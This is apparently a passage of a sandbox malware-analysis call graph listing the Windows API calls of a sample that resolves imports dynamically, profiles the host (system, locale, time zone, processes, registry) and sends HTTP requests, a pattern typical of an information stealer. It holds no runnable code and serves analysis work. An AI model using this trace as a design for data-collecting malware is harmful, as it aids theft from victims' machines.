3845c0 2 API calls 13941->13942 13943 383c7b 13942->13943 13944 3845c0 2 API calls 13943->13944 13945 383c94 13944->13945 13946 3845c0 2 API calls 13945->13946 13947 383cad 13946->13947 13948 3845c0 2 API calls 13947->13948 13949 383cc6 13948->13949 13950 3845c0 2 API calls 13949->13950 13951 383cdf 13950->13951 13952 3845c0 2 API calls 13951->13952 13953 383cf8 13952->13953 13954 3845c0 2 API calls 13953->13954 13955 383d11 13954->13955 13956 3845c0 2 API calls 13955->13956 13957 383d2a 13956->13957 13958 3845c0 2 API calls 13957->13958 13959 383d43 13958->13959 13960 3845c0 2 API calls 13959->13960 13961 383d5c 13960->13961 13962 3845c0 2 API calls 13961->13962 13963 383d75 13962->13963 13964 3845c0 2 API calls 13963->13964 13965 383d8e 13964->13965 13966 3845c0 2 API calls 13965->13966 13967 383da7 13966->13967 13968 3845c0 2 API calls 13967->13968 13969 383dc0 13968->13969 13970 3845c0 2 API calls 13969->13970 13971 383dd9 13970->13971 13972 3845c0 2 API calls 13971->13972 13973 383df2 13972->13973 13974 3845c0 2 API calls 13973->13974 13975 383e0b 13974->13975 13976 3845c0 2 API calls 13975->13976 13977 383e24 13976->13977 13978 3845c0 2 API calls 13977->13978 13979 383e3d 13978->13979 13980 3845c0 2 API calls 13979->13980 13981 383e56 13980->13981 13982 3845c0 2 API calls 13981->13982 13983 383e6f 13982->13983 13984 3845c0 2 API calls 13983->13984 13985 383e88 13984->13985 13986 3845c0 2 API calls 13985->13986 13987 383ea1 13986->13987 13988 3845c0 2 API calls 13987->13988 13989 383eba 13988->13989 13990 3845c0 2 API calls 13989->13990 13991 383ed3 13990->13991 13992 3845c0 2 API calls 13991->13992 13993 383eec 13992->13993 13994 3845c0 2 API calls 13993->13994 13995 383f05 13994->13995 13996 3845c0 2 API calls 13995->13996 13997 383f1e 13996->13997 13998 3845c0 2 API calls 13997->13998 13999 383f37 13998->13999 14000 3845c0 2 API calls 13999->14000 14001 383f50 14000->14001 14002 3845c0 2 API calls 14001->14002 14003 383f69 14002->14003 14004 3845c0 2 API calls 14003->14004 14005 383f82 14004->14005 14006 3845c0 2 API calls 14005->14006 14007 383f9b 14006->14007 14008 3845c0 2 API calls 14007->14008 14009 383fb4 14008->14009 14010 3845c0 2 API calls 14009->14010 14011 383fcd 14010->14011 14012 3845c0 2 API calls 14011->14012 14013 383fe6 14012->14013 14014 3845c0 2 API calls 14013->14014 14015 383fff 14014->14015 14016 3845c0 2 API calls 14015->14016 14017 384018 14016->14017 14018 3845c0 2 API calls 14017->14018 14019 384031 14018->14019 14020 3845c0 2 API calls 14019->14020 14021 38404a 14020->14021 14022 3845c0 2 API calls 14021->14022 14023 384063 14022->14023 14024 3845c0 2 API calls 14023->14024 14025 38407c 14024->14025 14026 3845c0 2 API calls 14025->14026 14027 384095 14026->14027 14028 3845c0 2 API calls 14027->14028 14029 3840ae 14028->14029 14030 3845c0 2 API calls 14029->14030 14031 3840c7 14030->14031 14032 3845c0 2 API calls 14031->14032 14033 3840e0 14032->14033 14034 3845c0 2 API calls 14033->14034 14035 3840f9 14034->14035 14036 3845c0 2 API calls 14035->14036 14037 384112 14036->14037 14038 3845c0 2 API calls 14037->14038 14039 38412b 14038->14039 14040 3845c0 2 API calls 14039->14040 14041 384144 14040->14041 14042 3845c0 2 API calls 14041->14042 14043 38415d 14042->14043 14044 3845c0 2 API calls 14043->14044 14045 384176 14044->14045 14046 3845c0 2 API calls 14045->14046 14047 38418f 14046->14047 14048 3845c0 2 API calls 14047->14048 14049 3841a8 14048->14049 14050 3845c0 2 API calls 14049->14050 14051 3841c1 14050->14051 14052 3845c0 2 API calls 14051->14052 14053 3841da 14052->14053 14054 3845c0 2 API calls 14053->14054 14055 3841f3 14054->14055 14056 3845c0 2 API calls 14055->14056 14057 38420c 14056->14057 14058 3845c0 2 API calls 14057->14058 14059 384225 14058->14059 14060 3845c0 2 API calls 14059->14060 14061 38423e 14060->14061 14062 3845c0 2 API calls 14061->14062 14063 384257 14062->14063 14064 3845c0 2 API calls 14063->14064 14065 384270 14064->14065 14066 3845c0 2 API calls 14065->14066 14067 384289 14066->14067 14068 3845c0 2 API calls 14067->14068 14069 3842a2 14068->14069 14070 3845c0 2 API calls 14069->14070 14071 3842bb 14070->14071 14072 3845c0 2 API calls 14071->14072 14073 3842d4 14072->14073 14074 3845c0 2 API calls 14073->14074 14075 3842ed 14074->14075 14076 3845c0 2 API calls 14075->14076 14077 384306 14076->14077 14078 3845c0 2 API calls 14077->14078 14079 38431f 14078->14079 14080 3845c0 2 API calls 14079->14080 14081 384338 14080->14081 14082 3845c0 2 API calls 14081->14082 14083 384351 14082->14083 14084 3845c0 2 API calls 14083->14084 14085 38436a 14084->14085 14086 3845c0 2 API calls 14085->14086 14087 384383 14086->14087 14088 3845c0 2 API calls 14087->14088 14089 38439c 14088->14089 14090 3845c0 2 API calls 14089->14090 14091 3843b5 14090->14091 14092 3845c0 2 API calls 14091->14092 14093 3843ce 14092->14093 14094 3845c0 2 API calls 14093->14094 14095 3843e7 14094->14095 14096 3845c0 2 API calls 14095->14096 14097 384400 14096->14097 14098 3845c0 2 API calls 14097->14098 14099 384419 14098->14099 14100 3845c0 2 API calls 14099->14100 14101 384432 14100->14101 14102 3845c0 2 API calls 14101->14102 14103 38444b 14102->14103 14104 3845c0 2 API calls 14103->14104 14105 384464 14104->14105 14106 3845c0 2 API calls 14105->14106 14107 38447d 14106->14107 14108 3845c0 2 API calls 14107->14108 14109 384496 14108->14109 14110 3845c0 2 API calls 14109->14110 14111 3844af 14110->14111 14112 3845c0 2 API calls 14111->14112 14113 3844c8 14112->14113 14114 3845c0 2 API calls 14113->14114 14115 3844e1 14114->14115 14116 3845c0 2 API calls 14115->14116 14117 3844fa 14116->14117 14118 3845c0 2 API calls 14117->14118 14119 384513 14118->14119 14120 3845c0 2 API calls 14119->14120 14121 38452c 14120->14121 14122 3845c0 2 API calls 14121->14122 14123 384545 14122->14123 14124 3845c0 2 API calls 14123->14124 14125 38455e 14124->14125 14126 3845c0 2 API calls 14125->14126 14127 384577 14126->14127 14128 3845c0 2 API calls 14127->14128 14129 384590 14128->14129 14130 3845c0 2 API calls 14129->14130 14131 3845a9 14130->14131 14132 399c10 14131->14132 14133 399c20 43 API calls 14132->14133 14134 39a036 8 API calls 14132->14134 14133->14134 14135 39a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14134->14135 14136 39a146 14134->14136 14135->14136 14137 39a153 8 API calls 14136->14137 14138 39a216 14136->14138 14137->14138 14139 39a298 14138->14139 14140 39a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14138->14140 14141 39a2a5 6 API calls 14139->14141 14142 39a337 14139->14142 14140->14139 14141->14142 14143 39a41f 14142->14143 14144 39a344 9 API calls 14142->14144 14145 39a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14143->14145 14146 39a4a2 14143->14146 14144->14143 14145->14146 14147 39a4ab GetProcAddress GetProcAddress 14146->14147 14148 39a4dc 14146->14148 14147->14148 14149 39a515 14148->14149 14150 39a4e5 GetProcAddress GetProcAddress 14148->14150 14151 39a612 14149->14151 14152 39a522 10 API calls 14149->14152 14150->14149 14153 39a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14151->14153 14154 39a67d 14151->14154 14152->14151 14153->14154 14155 39a69e 14154->14155 14156 39a686 GetProcAddress 14154->14156 14157 395ca3 14155->14157 14158 39a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14155->14158 14156->14155 14159 381590 14157->14159 14158->14157 15280 381670 14159->15280 14162 39a7a0 lstrcpy 14163 3815b5 14162->14163 14164 39a7a0 lstrcpy 14163->14164 14165 3815c7 14164->14165 14166 39a7a0 lstrcpy 14165->14166 14167 3815d9 14166->14167 14168 39a7a0 lstrcpy 14167->14168 14169 381663 14168->14169 14170 395510 14169->14170 14171 395521 14170->14171 14172 39a820 2 API calls 14171->14172 14173 39552e 14172->14173 14174 39a820 2 API calls 14173->14174 14175 39553b 14174->14175 14176 39a820 2 API calls 14175->14176 14177 395548 14176->14177 14178 39a740 lstrcpy 14177->14178 14179 395555 14178->14179 14180 39a740 lstrcpy 14179->14180 14181 395562 14180->14181 14182 39a740 lstrcpy 14181->14182 14183 39556f 14182->14183 14184 39a740 lstrcpy 14183->14184 14186 39557c 14184->14186 14185 381590 lstrcpy 14185->14186 14186->14185 14187 395643 StrCmpCA 14186->14187 14188 3956a0 StrCmpCA 14186->14188 14192 39a740 lstrcpy 14186->14192 14193 39a820 lstrlen lstrcpy 14186->14193 14195 395856 StrCmpCA 14186->14195 14199 39a7a0 lstrcpy 14186->14199 14206 395a0b StrCmpCA 14186->14206 14216 3952c0 25 API calls 14186->14216 14219 39578a StrCmpCA 14186->14219 14221 39593f StrCmpCA 14186->14221 14223 3951f0 20 API calls 14186->14223 14224 39a8a0 lstrcpy 14186->14224 14187->14186 14188->14186 14189 3957dc 14188->14189 14190 39a8a0 lstrcpy 14189->14190 14191 3957e8 14190->14191 14194 39a820 2 API calls 14191->14194 14192->14186 14193->14186 14196 3957f6 14194->14196 14195->14186 14198 395991 14195->14198 14197 39a820 2 API calls 14196->14197 14200 395805 14197->14200 14201 39a8a0 lstrcpy 14198->14201 14199->14186 14202 381670 lstrcpy 14200->14202 14203 39599d 14201->14203 14222 395811 14202->14222 14204 39a820 2 API calls 14203->14204 14205 3959ab 14204->14205 14207 39a820 2 API calls 14205->14207 14208 395a28 14206->14208 14209 395a16 Sleep 14206->14209 14210 3959ba 14207->14210 14211 39a8a0 lstrcpy 14208->14211 14209->14186 14212 381670 lstrcpy 14210->14212 14213 395a34 14211->14213 14212->14222 14214 39a820 2 API calls 14213->14214 14215 395a43 14214->14215 14217 39a820 2 API calls 14215->14217 14216->14186 14218 395a52 14217->14218 14220 381670 lstrcpy 14218->14220 14219->14186 14220->14222 14221->14186 14222->13277 14223->14186 14224->14186 14226 39754c 14225->14226 14227 397553 GetVolumeInformationA 14225->14227 14226->14227 14228 397591 14227->14228 14229 3975fc GetProcessHeap RtlAllocateHeap 14228->14229 14230 397619 14229->14230 14231 397628 wsprintfA 14229->14231 14232 39a740 lstrcpy 14230->14232 14233 39a740 lstrcpy 14231->14233 14234 395da7 14232->14234 14233->14234 14234->13298 14236 39a7a0 lstrcpy 14235->14236 14237 384899 14236->14237 15289 3847b0 14237->15289 14239 3848a5 14240 39a740 lstrcpy 14239->14240 14241 3848d7 14240->14241 14242 39a740 lstrcpy 14241->14242 14243 3848e4 14242->14243 14244 39a740 lstrcpy 14243->14244 14245 3848f1 14244->14245 14246 39a740 lstrcpy 14245->14246 14247 3848fe 14246->14247 14248 39a740 lstrcpy 14247->14248 14249 38490b InternetOpenA StrCmpCA 14248->14249 14250 384944 14249->14250 14251 384ecb InternetCloseHandle 14250->14251 15295 398b60 14250->15295 14253 384ee8 14251->14253 15310 389ac0 CryptStringToBinaryA 14253->15310 14254 384963 15303 39a920 14254->15303 14257 384976 14259 39a8a0 lstrcpy 14257->14259 14265 38497f 14259->14265 14260 39a820 2 API calls 14261 384f05 14260->14261 14263 39a9b0 4 API calls 14261->14263 14262 384f27 ctype 14267 39a7a0 lstrcpy 14262->14267 14264 384f1b 14263->14264 14266 39a8a0 lstrcpy 14264->14266 14268 39a9b0 4 API calls 14265->14268 14266->14262 14279 384f57 14267->14279 14269 3849a9 14268->14269 14270 39a8a0 lstrcpy 14269->14270 14271 3849b2 14270->14271 14272 39a9b0 4 API calls 14271->14272 14273 3849d1 14272->14273 14274 39a8a0 lstrcpy 14273->14274 14275 3849da 14274->14275 14276 39a920 3 API calls 14275->14276 14277 3849f8 14276->14277 14278 39a8a0 lstrcpy 14277->14278 14280 384a01 14278->14280 14279->13301 14281 39a9b0 4 API calls 14280->14281 14282 384a20 14281->14282 14283 39a8a0 lstrcpy 14282->14283 14284 384a29 14283->14284 14285 39a9b0 4 API calls 14284->14285 14286 384a48 14285->14286 14287 39a8a0 lstrcpy 14286->14287 14288 384a51 14287->14288 14289 39a9b0 4 API calls 14288->14289 14290 384a7d 14289->14290 14291 39a920 3 API calls 14290->14291 14292 384a84 14291->14292 14293 39a8a0 lstrcpy 14292->14293 14294 384a8d 14293->14294 14295 384aa3 InternetConnectA 14294->14295 14295->14251 14296 384ad3 HttpOpenRequestA 14295->14296 14298 384b28 14296->14298 14299 384ebe InternetCloseHandle 14296->14299 14300 39a9b0 4 API calls 14298->14300 14299->14251 14301 384b3c 14300->14301 14302 39a8a0 lstrcpy 14301->14302 14303 384b45 14302->14303 14304 39a920 3 API calls 14303->14304 14305 384b63 14304->14305 14306 39a8a0 lstrcpy 14305->14306 14307 384b6c 14306->14307 14308 39a9b0 4 API calls 14307->14308 14309 384b8b 14308->14309 14310 39a8a0 lstrcpy 14309->14310 14311 384b94 14310->14311 14312 39a9b0 4 API calls 14311->14312 14313 384bb5 14312->14313 14314 39a8a0 lstrcpy 14313->14314 14315 384bbe 14314->14315 14316 39a9b0 4 API calls 14315->14316 14317 384bde 14316->14317 14318 39a8a0 lstrcpy 14317->14318 14319 384be7 14318->14319 14320 39a9b0 4 API calls 14319->14320 14321 384c06 14320->14321 14322 39a8a0 lstrcpy 14321->14322 14323 384c0f 14322->14323 14324 39a920 3 API calls 14323->14324 14325 384c2d 14324->14325 14326 39a8a0 lstrcpy 14325->14326 14327 384c36 14326->14327 14328 39a9b0 4 API calls 14327->14328 14329 384c55 14328->14329 14330 39a8a0 lstrcpy 14329->14330 14331 384c5e 14330->14331 14332 39a9b0 4 API calls 14331->14332 14333 384c7d 14332->14333 14334 39a8a0 lstrcpy 14333->14334 14335 384c86 14334->14335 14336 39a920 3 API calls 14335->14336 14337 384ca4 14336->14337 14338 39a8a0 lstrcpy 14337->14338 14339 384cad 14338->14339 14340 39a9b0 4 API calls 14339->14340 14341 384ccc 14340->14341 14342 39a8a0 lstrcpy 14341->14342 14343 384cd5 14342->14343 14344 39a9b0 4 API calls 14343->14344 14345 384cf6 14344->14345 14346 39a8a0 lstrcpy 14345->14346 14347 384cff 14346->14347 14348 39a9b0 4 API calls 14347->14348 14349 384d1f 14348->14349 14350 39a8a0 lstrcpy 14349->14350 14351 384d28 14350->14351 14352 39a9b0 4 API calls 14351->14352 14353 384d47 14352->14353 14354 39a8a0 lstrcpy 14353->14354 14355 384d50 14354->14355 14356 39a920 3 API calls 14355->14356 14357 384d6e 14356->14357 14358 39a8a0 lstrcpy 14357->14358 14359 384d77 14358->14359 14360 39a740 lstrcpy 14359->14360 14361 384d92 14360->14361 14362 39a920 3 API calls 14361->14362 14363 384db3 14362->14363 14364 39a920 3 API calls 14363->14364 14365 384dba 14364->14365 14366 39a8a0 lstrcpy 14365->14366 14367 384dc6 14366->14367 14368 384de7 lstrlen 14367->14368 14369 384dfa 14368->14369 14370 384e03 lstrlen 14369->14370 15309 39aad0 14370->15309 14372 384e13 HttpSendRequestA 14373 384e32 InternetReadFile 14372->14373 14374 384e67 InternetCloseHandle 14373->14374 14379 384e5e 14373->14379 14376 39a800 14374->14376 14376->14299 14377 39a9b0 4 API calls 14377->14379 14378 39a8a0 lstrcpy 14378->14379 14379->14373 14379->14374 14379->14377 14379->14378 15316 39aad0 14380->15316 14382 3917c4 StrCmpCA 14383 3917cf ExitProcess 14382->14383 14384 3917d7 14382->14384 14385 3919c2 14384->14385 14386 39185d StrCmpCA 14384->14386 14387 39187f StrCmpCA 14384->14387 14388 3918f1 StrCmpCA 14384->14388 14389 391951 StrCmpCA 14384->14389 14390 391970 StrCmpCA 14384->14390 14391 391913 StrCmpCA 14384->14391 14392 391932 StrCmpCA 14384->14392 14393 3918ad StrCmpCA 14384->14393 14394 3918cf StrCmpCA 14384->14394 14395 39a820 lstrlen lstrcpy 14384->14395 14385->13303 14386->14384 14387->14384 14388->14384 14389->14384 14390->14384 14391->14384 14392->14384 14393->14384 14394->14384 14395->14384 14397 39a7a0 lstrcpy 14396->14397 14398 385979 14397->14398 14399 3847b0 2 API calls 14398->14399 14400 385985 14399->14400 14401 39a740 lstrcpy 14400->14401 14402 3859ba 14401->14402 14403 39a740 lstrcpy 14402->14403 14404 3859c7 14403->14404 14405 39a740 lstrcpy 14404->14405 14406 3859d4 14405->14406 14407 39a740 lstrcpy 14406->14407 14408 3859e1 14407->14408 14409 39a740 lstrcpy 14408->14409 14410 3859ee InternetOpenA StrCmpCA 14409->14410 14411 385a1d 14410->14411 14412 385fc3 InternetCloseHandle 14411->14412 14413 398b60 3 API calls 14411->14413 14414 385fe0 14412->14414 14415 385a3c 14413->14415 14417 389ac0 4 API calls 14414->14417 14416 39a920 3 API calls 14415->14416 14418 385a4f 14416->14418 14419 385fe6 14417->14419 14420 39a8a0 lstrcpy 14418->14420 14421 39a820 2 API calls 14419->14421 14424 38601f ctype 14419->14424 14425 385a58 14420->14425 14422 385ffd 14421->14422 14423 39a9b0 4 API calls 14422->14423 14426 386013 14423->14426 14427 39a7a0 lstrcpy 14424->14427 14429 39a9b0 4 API calls 14425->14429 14428 39a8a0 lstrcpy 14426->14428 14438 38604f 14427->14438 14428->14424 14430 385a82 14429->14430 14431 39a8a0 lstrcpy 14430->14431 14432 385a8b 14431->14432 14433 39a9b0 4 API calls 14432->14433 14434 385aaa 14433->14434 14435 39a8a0 lstrcpy 14434->14435 14436 385ab3 14435->14436 14437 39a920 3 API calls 14436->14437 14439 385ad1 14437->14439 14438->13309 14440 39a8a0 lstrcpy 14439->14440 14441 385ada 14440->14441 14442 39a9b0 4 API calls 14441->14442 14443 385af9 14442->14443 14444 39a8a0 lstrcpy 14443->14444 14445 385b02 14444->14445 14446 39a9b0 4 API calls 14445->14446 14447 385b21 14446->14447 14448 39a8a0 lstrcpy 14447->14448 14449 385b2a 14448->14449 14450 39a9b0 4 API calls 14449->14450 14451 385b56 14450->14451 14452 39a920 3 API calls 14451->14452 14453 385b5d 14452->14453 14454 39a8a0 lstrcpy 14453->14454 14455 385b66 14454->14455 14456 385b7c InternetConnectA 14455->14456 14456->14412 14457 385bac HttpOpenRequestA 14456->14457 14459 385c0b 14457->14459 14460 385fb6 InternetCloseHandle 14457->14460 14461 39a9b0 4 API calls 14459->14461 14460->14412 14462 385c1f 14461->14462 14463 39a8a0 lstrcpy 14462->14463 14464 385c28 14463->14464 14465 39a920 3 API calls 14464->14465 14466 385c46 14465->14466 14467 39a8a0 lstrcpy 14466->14467 14468 385c4f 14467->14468 14469 39a9b0 4 API calls 14468->14469 14470 385c6e 14469->14470 14471 39a8a0 lstrcpy 14470->14471 14472 385c77 14471->14472 14473 39a9b0 4 API calls 14472->14473 14474 385c98 14473->14474 14475 39a8a0 lstrcpy 14474->14475 14476 385ca1 14475->14476 14477 39a9b0 4 API calls 14476->14477 14478 385cc1 14477->14478 14479 39a8a0 lstrcpy 14478->14479 14480 385cca 14479->14480 14481 39a9b0 4 API calls 14480->14481 14482 385ce9 14481->14482 14483 39a8a0 lstrcpy 14482->14483 14484 385cf2 14483->14484 14485 39a920 3 API calls 14484->14485 14486 385d10 14485->14486 14487 39a8a0 lstrcpy 14486->14487 14488 385d19 14487->14488 14489 39a9b0 4 API calls 14488->14489 14490 385d38 14489->14490 14491 39a8a0 lstrcpy 14490->14491 14492 385d41 14491->14492 14493 39a9b0 4 API calls 14492->14493 14494 385d60 14493->14494 14495 39a8a0 lstrcpy 14494->14495 14496 385d69 14495->14496 14497 39a920 3 API calls 14496->14497 14498 385d87 14497->14498 14499 39a8a0 lstrcpy 14498->14499 14500 385d90 14499->14500 14501 39a9b0 4 API calls 14500->14501 14502 385daf 14501->14502 14503 39a8a0 lstrcpy 14502->14503 14504 385db8 14503->14504 14505 39a9b0 4 API calls 14504->14505 14506 385dd9 14505->14506 14507 39a8a0 lstrcpy 14506->14507 14508 385de2 14507->14508 14509 39a9b0 4 API calls 14508->14509 14510 385e02 14509->14510 14511 39a8a0 lstrcpy 14510->14511 14512 385e0b 14511->14512 14513 39a9b0 4 API calls 14512->14513 14514 385e2a 14513->14514 14515 39a8a0 lstrcpy 14514->14515 14516 385e33 14515->14516 14517 39a920 3 API calls 14516->14517 14518 385e54 14517->14518 14519 39a8a0 lstrcpy 14518->14519 14520 385e5d 14519->14520 14521 385e70 lstrlen 14520->14521 15317 39aad0 14521->15317 14523 385e81 lstrlen GetProcessHeap RtlAllocateHeap 15318 39aad0 14523->15318 14525 385eae lstrlen 14526 385ebe 14525->14526 14527 385ed7 lstrlen 14526->14527 14528 385ee7 14527->14528 14529 385ef0 lstrlen 14528->14529 14530 385f04 14529->14530 14531 385f1a lstrlen 14530->14531 15319 39aad0 14531->15319 14533 385f2a HttpSendRequestA 14534 385f35 InternetReadFile 14533->14534 14535 385f6a InternetCloseHandle 14534->14535 14539 385f61 14534->14539 14535->14460 14537 39a9b0 4 API calls 14537->14539 14538 39a8a0 lstrcpy 14538->14539 14539->14534 14539->14535 14539->14537 14539->14538 14542 391077 14540->14542 14541 391151 14541->13311 14542->14541 14543 39a820 lstrlen lstrcpy 14542->14543 14543->14542 14545 390db7 14544->14545 14546 390f17 14545->14546 14547 390ea4 StrCmpCA 14545->14547 14548 390e27 StrCmpCA 14545->14548 14549 390e67 StrCmpCA 14545->14549 14550 39a820 lstrlen lstrcpy 14545->14550 14546->13319 14547->14545 14548->14545 14549->14545 14550->14545 14554 390f67 14551->14554 14552 391044 14552->13327 14553 390fb2 StrCmpCA 14553->14554 14554->14552 14554->14553 14555 39a820 lstrlen lstrcpy 14554->14555 14555->14554 14557 39a740 lstrcpy 14556->14557 14558 391a26 14557->14558 14559 39a9b0 4 API calls 14558->14559 14560 391a37 14559->14560 14561 39a8a0 lstrcpy 14560->14561 14562 391a40 14561->14562 14563 39a9b0 4 API calls 14562->14563 14564 391a5b 14563->14564 14565 39a8a0 lstrcpy 14564->14565 14566 391a64 14565->14566 14567 39a9b0 4 API calls 14566->14567 14568 391a7d 14567->14568 14569 39a8a0 lstrcpy 14568->14569 14570 391a86 14569->14570 14571 39a9b0 4 API calls 14570->14571 14572 391aa1 14571->14572 14573 39a8a0 lstrcpy 14572->14573 14574 391aaa 14573->14574 14575 39a9b0 4 API calls 14574->14575 14576 391ac3 14575->14576 14577 39a8a0 lstrcpy 14576->14577 14578 391acc 14577->14578 14579 39a9b0 4 API calls 14578->14579 14580 391ae7 14579->14580 14581 39a8a0 lstrcpy 14580->14581 14582 391af0 14581->14582 14583 39a9b0 4 API calls 14582->14583 14584 391b09 14583->14584 14585 39a8a0 lstrcpy 14584->14585 14586 391b12 14585->14586 14587 39a9b0 4 API calls 14586->14587 14588 391b2d 14587->14588 14589 39a8a0 lstrcpy 14588->14589 14590 391b36 14589->14590 14591 39a9b0 4 API calls 14590->14591 14592 391b4f 14591->14592 14593 39a8a0 lstrcpy 14592->14593 14594 391b58 14593->14594 14595 39a9b0 4 API calls 14594->14595 14596 391b76 14595->14596 14597 39a8a0 lstrcpy 14596->14597 14598 391b7f 14597->14598 14599 397500 6 API calls 14598->14599 14600 391b96 14599->14600 14601 39a920 3 API calls 14600->14601 14602 391ba9 14601->14602 14603 39a8a0 lstrcpy 14602->14603 14604 391bb2 14603->14604 14605 39a9b0 4 API calls 14604->14605 14606 391bdc 14605->14606 14607 39a8a0 lstrcpy 14606->14607 14608 391be5 14607->14608 14609 39a9b0 4 API calls 14608->14609 14610 391c05 14609->14610 14611 39a8a0 lstrcpy 14610->14611 14612 391c0e 14611->14612 15320 397690 GetProcessHeap RtlAllocateHeap 14612->15320 14615 39a9b0 4 API calls 14616 391c2e 14615->14616 14617 39a8a0 lstrcpy 14616->14617 14618 391c37 14617->14618 14619 39a9b0 4 API calls 14618->14619 14620 391c56 14619->14620 14621 39a8a0 lstrcpy 14620->14621 14622 391c5f 14621->14622 14623 39a9b0 4 API calls 14622->14623 14624 391c80 14623->14624 14625 39a8a0 lstrcpy 14624->14625 14626 391c89 14625->14626 15327 3977c0 GetCurrentProcess IsWow64Process 14626->15327 14629 39a9b0 4 API calls 14630 391ca9 14629->14630 14631 39a8a0 lstrcpy 14630->14631 14632 391cb2 14631->14632 14633 39a9b0 4 API calls 14632->14633 14634 391cd1 14633->14634 14635 39a8a0 lstrcpy 14634->14635 14636 391cda 14635->14636 14637 39a9b0 4 API calls 14636->14637 14638 391cfb 14637->14638 14639 39a8a0 lstrcpy 14638->14639 14640 391d04 14639->14640 14641 397850 3 API calls 14640->14641 14642 391d14 14641->14642 14643 39a9b0 4 API calls 14642->14643 14644 391d24 14643->14644 14645 39a8a0 lstrcpy 14644->14645 14646 391d2d 14645->14646 14647 39a9b0 4 API calls 14646->14647 14648 391d4c 14647->14648 14649 39a8a0 lstrcpy 14648->14649 14650 391d55 14649->14650 14651 39a9b0 4 API calls 14650->14651 14652 391d75 14651->14652 14653 39a8a0 lstrcpy 14652->14653 14654 391d7e 14653->14654 14655 3978e0 3 API calls 14654->14655 14656 391d8e 14655->14656 14657 39a9b0 4 API calls 14656->14657 14658 391d9e 14657->14658 14659 39a8a0 lstrcpy 14658->14659 14660 391da7 14659->14660 14661 39a9b0 4 API calls 14660->14661 14662 391dc6 14661->14662 14663 39a8a0 lstrcpy 14662->14663 14664 391dcf 14663->14664 14665 39a9b0 4 API calls 14664->14665 14666 391df0 14665->14666 14667 39a8a0 lstrcpy 14666->14667 14668 391df9 14667->14668 15329 397980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14668->15329 14671 39a9b0 4 API calls 14672 391e19 14671->14672 14673 39a8a0 lstrcpy 14672->14673 14674 391e22 14673->14674 14675 39a9b0 4 API calls 14674->14675 14676 391e41 14675->14676 14677 39a8a0 lstrcpy 14676->14677 14678 391e4a 14677->14678 14679 39a9b0 4 API calls 14678->14679 14680 391e6b 14679->14680 14681 39a8a0 lstrcpy 14680->14681 14682 391e74 14681->14682 15331 397a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14682->15331 14685 39a9b0 4 API calls 14686 391e94 14685->14686 14687 39a8a0 lstrcpy 14686->14687 14688 391e9d 14687->14688 14689 39a9b0 4 API calls 14688->14689 14690 391ebc 14689->14690 14691 39a8a0 lstrcpy 14690->14691 14692 391ec5 14691->14692 14693 39a9b0 4 API calls 14692->14693 14694 391ee5 14693->14694 14695 39a8a0 lstrcpy 14694->14695 14696 391eee 14695->14696 15334 397b00 GetUserDefaultLocaleName 14696->15334 14699 39a9b0 4 API calls 14700 391f0e 14699->14700 14701 39a8a0 lstrcpy 14700->14701 14702 391f17 14701->14702 14703 39a9b0 4 API calls 14702->14703 14704 391f36 14703->14704 14705 39a8a0 lstrcpy 14704->14705 14706 391f3f 14705->14706 14707 39a9b0 4 API calls 14706->14707 14708 391f60 14707->14708 14709 39a8a0 lstrcpy 14708->14709 14710 391f69 14709->14710 15338 397b90 14710->15338 14712 391f80 14713 39a920 3 API calls 14712->14713 14714 391f93 14713->14714 14715 39a8a0 lstrcpy 14714->14715 14716 391f9c 14715->14716 14717 39a9b0 4 API calls 14716->14717 14718 391fc6 14717->14718 14719 39a8a0 lstrcpy 14718->14719 14720 391fcf 14719->14720 14721 39a9b0 4 API calls 14720->14721 14722 391fef 14721->14722 14723 39a8a0 lstrcpy 14722->14723 14724 391ff8 14723->14724 15350 397d80 GetSystemPowerStatus 14724->15350 14727 39a9b0 4 API calls 14728 392018 14727->14728 14729 39a8a0 lstrcpy 14728->14729 14730 392021 14729->14730 14731 39a9b0 4 API calls 14730->14731 14732 392040 14731->14732 14733 39a8a0 lstrcpy 14732->14733 14734 392049 14733->14734 14735 39a9b0 4 API calls 14734->14735 14736 39206a 14735->14736 14737 39a8a0 lstrcpy 14736->14737 14738 392073 14737->14738 14739 39207e GetCurrentProcessId 14738->14739 15352 399470 OpenProcess 14739->15352 14742 39a920 3 API calls 14743 3920a4 14742->14743 14744 39a8a0 lstrcpy 14743->14744 14745 3920ad 14744->14745 14746 39a9b0 4 API calls 14745->14746 14747 3920d7 14746->14747 14748 39a8a0 lstrcpy 14747->14748 14749 3920e0 14748->14749 14750 39a9b0 4 API calls 14749->14750 14751 392100 14750->14751 14752 39a8a0 lstrcpy 14751->14752 14753 392109 14752->14753 15357 397e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14753->15357 14756 39a9b0 4 API calls 14757 392129 14756->14757 14758 39a8a0 lstrcpy 14757->14758 14759 392132 14758->14759 14760 39a9b0 4 API calls 14759->14760 14761 392151 14760->14761 14762 39a8a0 lstrcpy 14761->14762 14763 39215a 14762->14763 14764 39a9b0 4 API calls 14763->14764 14765 39217b 14764->14765 14766 39a8a0 lstrcpy 14765->14766 14767 392184 14766->14767 15361 397f60 14767->15361 14770 39a9b0 4 API calls 14771 3921a4 14770->14771 14772 39a8a0 lstrcpy 14771->14772 14773 3921ad 14772->14773 14774 39a9b0 4 API calls 14773->14774 14775 3921cc 14774->14775 14776 39a8a0 lstrcpy 14775->14776 14777 3921d5 14776->14777 14778 39a9b0 4 API calls 14777->14778 14779 3921f6 14778->14779 14780 39a8a0 lstrcpy 14779->14780 14781 3921ff 14780->14781 15374 397ed0 GetSystemInfo wsprintfA 14781->15374 14784 39a9b0 4 API calls 14785 39221f 14784->14785 14786 39a8a0 lstrcpy 14785->14786 14787 392228 14786->14787 14788 39a9b0 4 API calls 14787->14788 14789 392247 14788->14789 14790 39a8a0 lstrcpy 14789->14790 14791 392250 14790->14791 14792 39a9b0 4 API calls 14791->14792 14793 392270 14792->14793 14794 39a8a0 lstrcpy 14793->14794 14795 392279 14794->14795 15376 398100 GetProcessHeap RtlAllocateHeap 14795->15376 14798 39a9b0 4 API calls 14799 392299 14798->14799 14800 39a8a0 lstrcpy 14799->14800 14801 3922a2 14800->14801 14802 39a9b0 4 API calls 